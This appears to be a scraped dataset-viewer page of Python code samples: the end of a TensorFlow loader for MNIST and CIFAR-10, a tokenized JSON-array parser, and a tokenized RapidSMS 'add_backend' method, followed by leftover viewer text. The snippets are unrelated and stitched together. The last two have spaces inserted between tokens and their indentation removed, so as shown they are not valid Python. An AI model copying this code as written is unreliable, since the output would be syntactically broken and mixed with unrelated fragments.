            train_iterator: A tf.data.Iterator, over training data.
            test_iterator: A tf.data.Iterator, over test data.
            num_classes: Integer. Number of class labels.
    """
    if name not in ('mnist', 'cifar10'):
        raise ValueError('Expected dataset \'mnist\' or \'cifar10\', but got %s' % name)
    num_classes = 10
    # Fetch the raw numpy arrays for the requested dataset.
    loader = getattr(tf.keras.datasets, name)
    (x_train, y_train), (x_test, y_test) = loader.load_data()
    # Scale pixel values into [0, 1] and coerce label dtypes for TF.
    x_train = x_train.astype(np.float32) / 255.
    x_test = x_test.astype(np.float32) / 255.
    y_train = y_train.astype(np.int32).squeeze()
    y_test = y_test.astype(np.int32).squeeze()
    # Grayscale images arrive without a channel axis; add a trailing one.
    if x_train.ndim == 3:
        x_train = np.expand_dims(x_train, -1)
        x_test = np.expand_dims(x_test, -1)
    # Put the data onto the graph as constants.
    train_data = tf.data.Dataset.from_tensor_slices((x_train, y_train))
    test_data = tf.data.Dataset.from_tensor_slices((x_test, y_test))
    # Note: for larger datasets (e.g. ImageNet) a shuffle buffer covering the
    # whole training set would not be feasible.
    train_iterator = (train_data
                      .shuffle(buffer_size=len(x_train))
                      .batch(train_batch_size)
                      .repeat()
                      .make_one_shot_iterator())
    test_iterator = test_data.batch(test_batch_size).make_initializable_iterator()
    return {
        'train_iterator': train_iterator,
        'test_iterator': test_iterator,
        'num_classes': num_classes,
    }
|
def _parse_array ( value ) :
"""Coerce value into an list .
: param str value : Value to parse .
: returns : list or None if the value is not a JSON array
: raises : TypeError or ValueError if value appears to be an array but can ' t
be parsed as JSON ."""
|
value = value . lstrip ( )
if not value or value [ 0 ] not in _bracket_strings :
return None
return json . loads ( value )
|
def add_backend ( self , backend ) :
"Add a RapidSMS backend to this tenant"
|
if backend in self . get_backends ( ) :
return
backend_link , created = BackendLink . all_tenants . get_or_create ( backend = backend )
self . backendlink_set . add ( backend_link )
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.